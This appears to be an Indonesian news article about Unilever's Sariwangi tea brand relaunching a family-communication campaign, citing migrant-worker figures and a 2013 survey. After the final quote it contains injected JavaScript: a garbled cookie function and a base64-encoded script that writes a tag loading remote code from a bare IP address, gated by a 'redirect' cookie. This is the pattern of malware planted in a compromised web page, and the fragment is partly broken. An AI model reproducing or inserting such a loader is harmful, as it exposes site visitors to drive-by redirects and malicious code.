Sariwangi Perkuat Pasar Keluarga

Data BNP2TKI 2012 mencatat jumlah pekerja Indonesia yang ditempatkan di luar negeri 2006-2012 ada sebanyak 4 juta pekerja Indonesia terpisah dari keluarganya untuk bekerja di 'negeri orang'. Sebagian besar dari jumlah tersebut adalah perempuan dan tidak sedikit yang merupakan kaum ibu sehingga diperlukan upaya lebih untuk memenuhi tantangan berkomunikasi dan menjaga keluarga tetap harmonis.

Luncurkan kembali kampanye "Gerakan 15 Menit Sehari Berkualitas untuk Keluarga", Unilever melalui brand Sariwangi, memperkuat pasar keluarga.

Mario Abdisa, Senior Brand Manager Sariwangi PT Unilever Indonesia Tbk. mengatakan, “Melihat tantangan berkomunikasi yang dimiliki oleh keluarga yang terpisah jauh dengan jumlah yang sangat besar, Sariwangi mengajak keluarga Indonesia yang dekat secara fisik untuk memanfaatkan kesempatan bertemu yang ada minimal 15 menit sehari agar terwujud kebersamaan berkualitas.”

Untuk kesekian kalinya, sejak pertama kali diadakan di tahun 2008 dibawah Kampanye Mari Bicara yang awalnya untuk fokus untuk pasangan, kini Sariwangi kembali mengingatkan keluarga Indonesia akan keutamaan komunikasi sebagai elemen penting dalam kehidupan keluarga melalui kampanye "Gerakan 15 Menit Sehari Berkualitas untuk Keluarga".

Mario menjelaskan, kampanye "Gerakan 15 Menit Sehari Berkualitas untuk Keluarga" berupaya mengajak keluarga Indonesia agar senantiasa menjalin komunikasi efektif, antara lain dengan memanfaatkan kebiasaan bertemu setidaknya 15 menit sehari.

"Dalam pertemuan tersebut, anggota keluarga bisa saling bercerita dalam suasana minum teh hangat tanpa disertai gadget agar tercipta momen-momen spesial yang disertai obrolan yang efektif dari hati ke hati tanpa gangguan," katanya.

Berdasarkan riset secara telesurvei yang diadakan Sariwangi dengan Kompas Gramedia pada tahun 2013 di lima kota besar di Indonesia, menunjukkan bahwa 67% ibu sudah meluangkan waktu untuk keluarga selama 1 hingga 3 jam, namun merasa masih kurang berkualitas karena disertai kesibukan dari masing-masing anggota keluarga seperti menonton TV, bermain gadget, dan sebagainya. Oleh karena itu, Sariwangi mengajak keluarga Indonesia untuk kembali ke komunikasi tatap muka atau fisik yang berkualitas.

"Pada tahun 2013, kampanye Sariwangi "Gerakan 15 Menit Sehari" disertai kegiatan Kompetisi Berbagi Cerita dan pemenangnya mengikuti Tea Camp dari Sariwangi. Tetapi di tahun ini, "Gerakan 15 Menit Sehari Berkualitas untuk Keluarga" akan kembali diisi dengan kegiatan-kegiatan yang dapat menjadi inspirasi untuk keharmonisan keluarga," pungkas Mario. function getCookie(e)\(\)\\\\/\+^])/g,"\\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time)

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Sign In

Get the most out of SWA by signing in to your account

(close)

Register

Have an account? Sign In
(close)